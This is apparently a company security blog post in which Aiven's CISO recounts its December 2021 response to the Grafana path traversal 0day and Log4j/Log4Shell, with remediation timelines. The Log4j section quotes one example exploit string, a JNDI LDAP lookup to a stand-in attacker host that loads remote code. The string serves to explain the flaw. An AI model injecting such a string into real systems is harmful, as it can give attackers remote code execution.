Aiven Blog

Dec 20, 2021

Security updates: Grafana and Log4j

0day? How about 0december! Aiven's CISO recaps the recent vulnerabilities and what Aiven did about them.

james-arlen

James Arlen

|RSS Feed

Chief Information Security Officer at Aiven

Dear all,

We’ve been working through a couple of security issues this month already here at Aiven and like many security teams, we’re feeling a little run down and thought you could all use an update on what we’ve been doing about these issues.

Both of these issues represent some of the most interesting but also most painful kinds of security problems that we’ve seen before and will see again. James M. Barrie may have said it best in the quote from the opening narration of the Disney Peter Pan film - “all of this has happened before and it will all happen again”.

The Grafana issue is another case of OWASP Top Ten... input validation. We haven’t seen the end of this variety of issue; turns out that validating input is actually difficult. The log4j issue is one that is even more common - “at the time the functionality was added everyone agreed it was a good idea and no one thought about some kind of a negative interaction with other functionality in a complex code base” combined with the same kind of input validation problem that we saw with Grafana in the same week.

A key message from all security people to all developers should be: “We know that you’re doing difficult things under pressure and you’re going to make mistakes and we’ll work together to make it better”. However, I’m seeing a whole lot of security people pointing fingers at their developer colleagues and making a lot of really negative comments. These problems will happen over and over again. We should be prepared for them and work together to create the best possible outcomes.

Life at Aiven teaches you pretty quickly that Open Source is awesome because of the infinite flexibility of minds working together. It’s also awesome because we’re working together to make a better future for everyone.

Thanks.

Jamie, Aiven’s CISO

Grafana 0day path traversal

Grafana is a popular open source tool for visualizing information. At Aiven, we are happy to offer Aiven for Grafana as one of our open source services, but more importantly, we are also heavy users of Grafana ourselves. We now understand from Grafana’s blog entry that this issue started as a coordinated release event by Grafana and subsequently became publicly available prior to the Grafana team being able to provide the coordination - a 0day.

The issue was identified to the Grafana team on 2021-12-03 02:51 UTC, and they anticipated a public release of the fix by 2021-12-14. Aiven was alerted through a report to our bug bounty program at 2021-12-02 20:56 UTC by the same reporter, and we were already working on developing a fix over the course of the weekend.

We received several bug bounty reports for the same path traversal vulnerability between 2021-12-05 and 2021-12-06 which were marked as duplicates. This indicates that the issue was well known and beginning to circulate among the researcher community.

Our monitoring noted an increase of blind path traversal requests trying to probe for the vulnerability starting on 2021-12-06 but really coming on 2021-12-07.

We developed a fix internally that was ready at just about the time that the probe requests started to increase dramatically. The technical operations team declared an incident in order to mitigate any potentially outstanding issues, and the fix was implemented on an accelerated basis.

The vast majority of nodes were patched within a 75 minute window. A few services which were running in the degraded aws-us-east-1 region remained active and carefully monitored for an additional 3 hours while AWS recovered from their incident.

Once the bug bounty reporter was able to confirm our fix to their satisfaction, we paid out the bounty for this high severity bug.

Timeline

2021-12-02 20:56 UTC Bug bounty report received from Jordy

2021-12-03 02:51 UTC (from Grafana’s blog post - their first notification)

2021-12-05 10:25 UTC confirmation of issue and fix in development

2021-12-07 06:04 UTC completed development of the fix

2021-12-07 13:36 UTC testing completed

2021-12-07 13:49 UTC Incident declared

2021-12-07 13:58 UTC change merged into production branch

2021-12-07 17:15 UTC Grafana public Github repository has official fix for the vulnerability

2021-12-07 18:30 UTC Aiven starts to apply the patch to customer nodes

2021-12-07 19:42 UTC All Grafana for Aiven services have been patched with the Aiven developed fix except a small portion having in aws-us-east-1 region (that is degraded and new instances cannot be launched)

2021-12-07 22:31 UTC Grafana for Aiven services in aws-us-east-1 region (that was degraded and new instances could not be launched) have been patched.

2021-12-10 07:46 UTC Received response from Jordy confirming the fix

2021-12-10 16:00 UTC Paid the bounty for a High severity finding

The big one - Log4j / Log4shell

This is a significant Remote Code Execution (RCE) vulnerability and it’s in… everything! (No, seriously - it’s even in the NASA robot helicopter on Mars, and it caused the NSA to update their tooling!

This is an important vulnerability because it’s easy to exploit. If your computer runs any unpatched Java-based application, a simple attack like joining a Minecraft chat and receiving a message like "${jndi:ldap://badactor.crime/script}" is enough for potentially malicious code to be loaded and executed. Anything that causes a message to be logged in Java software via log4j, including chat messages that are routinely logged to disk by popular games like Minecraft, makes the system vulnerable, until all of these Java programs update the version of log4j that they use. This is going to be a very long-tail vulnerability due to the number of places that log4j is potentially running in your world.

Aiven was alerted to this issue 2021-12-10 00:49 UTC and immediately began to investigate the impact of CVE-2021-44228 on Aiven’s internal services and managed customer resources. By 2021-12-10 14:45 UTC, an incident was declared and immediate work began to mitigate and protect against this issue across all customer services and our own infrastructure. All Aiven services were remediated by 2021-12-11 03:46 UTC - a period of just over 24 hours from awareness to remediation.

Of all of the production services operated by Aiven for our customers, only Aiven for Elasticsearch and Aiven for OpenSearch were impacted. No other production services were affected.

Aiven for Apache Flink is a beta service not yet fully in production and was deprioritized for remediation. We made the decision to preemptively shut down all instances (unfortunately losing some data) to await business hours patching.

Specific details were published to our customers on the help.aiven.io site and communicated as needed through support ticketing.

At the time that this entry was posted, Aiven’s internal security team continues to monitor the situation for new exploits or threats. We’re working through our list of supporting vendors and ensuring that they have all taken appropriate action.

Interestingly, this attack vector was actually discussed during a presentation at Black Hat USA 2016 - “A Journey From JNDI/LDAP Manipulation to Remote Code Execution Dream Land” by Alvaro Muñoz and Oleksandr Mirosh, as noted in this tweet. The full impact of that research was not understood until we have the hindsight of this incident to provide context.

Timeline

2021-12-10 00:49 UTC Began internal investigation of CVE-2021-44228, its impact on Aiven internal services, and its impact on managed customer resources

2021-12-10 14:45 UTC Incident declared

2021-12-10 15:28 UTC Began deep dive assessment of exposure and impact, service-by-service

2021-12-10 17:27 UTC Began service-by-service remediation planning

2021-12-10 18:09 UTC Began execution of remediation plan for Aiven for
OpenSearch and Aiven for Elasticsearch

2021-12-10 19:07 UTC Disabled the creation of new Aiven for Apache Flink (beta) nodes, all vulnerable Aiven for Apache Flink nodes shut down

2021-12-10 19:36 UTC All necessary production system changes completed, began patching affected customer production nodes

2021-12-10 21:27 UTC Production upgrade completed; OpenSearch, Elasticsearch, and Flink production code patched; began restarting internal services

2021-12-11 02:36 UTC Internal services successfully patched and restarted; began restarting all affected OS/ES customer services

2021-12-11 03:46 UTC ES/OS service restart per cluster completed. All internal services and affected customer nodes successfully patched.

The creation of new services in Flink (beta) is still disabled as of 2021-12-13.

Updates from 2021-12-20

Aiven continues to monitor the evolving situation with the Log4Shell / Log4j vulnerabilities:

Our mitigation for the first and second vulnerabilities is in place across affected systems (Aiven for OpenSearch, Aiven for Elasticsearch, and [beta] Aiven for Apache Flink). The third vulnerability is not exploitable in the context of Aiven services, but we are updating to log4j 2.17 out of an abundance of caution as this set of vulnerabilities continues to expand.

If you have any questions, please reach out to support@aiven.io.


Related resources